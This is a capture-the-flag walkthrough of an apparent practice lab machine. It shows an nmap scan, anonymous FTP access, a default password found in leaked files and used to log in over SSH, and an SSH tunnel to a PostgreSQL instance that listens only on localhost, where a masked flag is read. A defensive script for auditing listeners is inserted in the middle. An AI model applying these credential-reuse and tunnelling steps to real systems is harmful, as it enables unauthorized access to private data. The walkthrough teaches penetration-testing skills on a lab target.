$ nmap -v -sV -p- 10.129.74.179 --min-rate 5000
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-04 10:15 CET
NSE: Loaded 45 scripts for scanning.
Initiating Ping Scan at 10:15
Scanning 10.129.74.179 [2 ports]
Completed Ping Scan at 10:15, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:15
Completed Parallel DNS resolution of 1 host. at 10:15, 0.02s elapsed
Initiating Connect Scan at 10:15
Scanning 10.129.74.179 [65535 ports]
Discovered open port 21/tcp on 10.129.74.179
Discovered open port 22/tcp on 10.129.74.179
Completed Connect Scan at 10:15, 12.86s elapsed (65535 total ports)
Initiating Service scan at 10:15
Scanning 2 services on 10.129.74.179
Completed Service scan at 10:15, 0.09s elapsed (2 services on 1 host)
NSE: Script scanning 10.129.74.179.
Initiating NSE at 10:15
Completed NSE at 10:15, 0.00s elapsed
Initiating NSE at 10:15
Completed NSE at 10:15, 0.00s elapsed
Nmap scan report for 10.129.74.179
Host is up (0.037s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.25 seconds
$ ftp 10.129.74.179
Connected to 10.129.74.179.
220 (vsFTPd 3.0.3)
Name (10.129.74.179:ruben): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||33254|)
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Nov 28 14:31 mail_backup
226 Directory send OK.
ftp>
Users detected:
optimus@funnel.htb
albert@funnel.htb
andreas@funnel.htb
christine@funnel.htb
maria@funnel.htb
According to the password policy found, the default password is funnel123#!#
$ ssh christine@10.129.74.179
christine@10.129.74.179's password:
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-135-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sat 04 Mar 2023 09:30:41 AM UTC
System load: 0.0
Usage of /: 63.2% of 4.78GB
Memory usage: 12%
Swap usage: 0%
Processes: 159
Users logged in: 0
IPv4 address for docker0: 172.17.0.1
IPv4 address for ens160: 10.129.74.179
IPv6 address for ens160: dead:beef::250:56ff:fe96:a7ea
* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
just raised the bar for easy, resilient and secure K8s cluster deployment.
https://ubuntu.com/engage/secure-kubernetes-at-the-edge
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Which service is running on TCP port 5432 and listens only on localhost?
christine@funnel:~$ ss -tulpn
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:36709 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:5432 0.0.0.0:*
tcp LISTEN 0 32 *:21 *:*
tcp LISTEN 0 128 [::]:22 [::]:*
Port 5432 is usually used by PostgreSQL.
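The listener table above can be audited mechanically. The following is an added example, not part of the original write-up: it reads `ss -tulpn` output (with the Netid column, as shown above) and separates loopback-only TCP listeners from exposed ones. Loopback-only services remain reachable by any account that can log in over SSH when port forwarding is permitted. The function names and the `SAMPLE_SS` variable are assumptions made for this example.

```shell
#!/bin/sh
# Added example: audit listeners from `ss -tulpn` output (Netid column present).

# Reads ss output on stdin; prints "<scope> <port> <address>" per TCP listener,
# where scope is "loopback" or "exposed".
classify_listeners() {
    awk '
    $1 == "tcp" && $2 == "LISTEN" {
        addr = $5
        # Port follows the last colon; IPv6 hosts contain colons themselves.
        if (!match(addr, /:[0-9]+$/)) next
        host = substr(addr, 1, RSTART - 1)
        port = substr(addr, RSTART + 1)
        sub(/%.*$/, "", host)       # strip interface suffix such as %lo
        gsub(/\[|\]/, "", host)     # strip IPv6 brackets
        scope = (host ~ /^127\./ || host == "::1") ? "loopback" : "exposed"
        print scope, port, host
    }'
}

# Ports bound to loopback only: not reachable from the network directly,
# but still reachable by an SSH user through local port forwarding.
loopback_ports() {
    classify_listeners | awk '$1 == "loopback" { print $2 }' | sort -n | paste -sd ' ' -
}

# Sample input: the lines of the ss output shown above.
SAMPLE_SS='Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:36709 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:5432 0.0.0.0:*
tcp LISTEN 0 32 *:21 *:*
tcp LISTEN 0 128 [::]:22 [::]:*'

printf '%s\n' "$SAMPLE_SS" | classify_listeners
echo "loopback-only ports: $(printf '%s\n' "$SAMPLE_SS" | loopback_ports)"
```

On a host where interactive users do not need tunnels, `AllowTcpForwarding no` in `sshd_config` removes this path to the loopback ports the script reports.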
As we don’t have access to the previously mentioned service from our local machine, we need to create a tunnel and connect to it through that tunnel.
$ ssh -L 1234:localhost:5432 christine@10.129.74.179
christine@10.129.74.179's password:
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-135-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sat 04 Mar 2023 10:16:35 AM UTC
System load: 0.0
Usage of /: 63.2% of 4.78GB
Memory usage: 13%
Swap usage: 0%
Processes: 161
Users logged in: 0
IPv4 address for docker0: 172.17.0.1
IPv4 address for ens160: 10.129.74.179
IPv6 address for ens160: dead:beef::250:56ff:fe96:a7ea
* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
just raised the bar for easy, resilient and secure K8s cluster deployment.
https://ubuntu.com/engage/secure-kubernetes-at-the-edge
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sat Mar 4 10:10:01 2023 from 10.10.14.16
$ psql -U christine -h localhost -p 1234
Contraseña para usuario christine:
psql (15.2 (Debian 15.2-1), servidor 15.1 (Debian 15.1-1.pgdg110+1))
Digite «help» para obtener ayuda.
christine=
christine=# \l
Listado de base de datos
Nombre | Dueño | Codificación | Collate | Ctype | configuración ICU | Proveedor de locale | Privilegios
-----------+-----------+--------------+------------+------------+-------------------+---------------------+-------------------------
christine | christine | UTF8 | en_US.utf8 | en_US.utf8 | | libc |
postgres | christine | UTF8 | en_US.utf8 | en_US.utf8 | | libc |
secrets | christine | UTF8 | en_US.utf8 | en_US.utf8 | | libc |
template0 | christine | UTF8 | en_US.utf8 | en_US.utf8 | | libc | =c/christine +
| | | | | | | christine=CTc/christine
template1 | christine | UTF8 | en_US.utf8 | en_US.utf8 | | libc | =c/christine +
| | | | | | | christine=CTc/christine
(5 filas)
christine=# \c secrets
psql (15.2 (Debian 15.2-1), servidor 15.1 (Debian 15.1-1.pgdg110+1))
Ahora está conectado a la base de datos «secrets» con el usuario «christine».
secrets=# \dt
Listado de relaciones
Esquema | Nombre | Tipo | Dueño
---------+--------+-------+-----------
public | flag | tabla | christine
(1 fila)
secrets=# SELECT * FROM flag;
value
----------------------------------
cf27XXXXXXXXXXXXXXXXXXXXXXXXXXXX
(1 fila)
secrets=#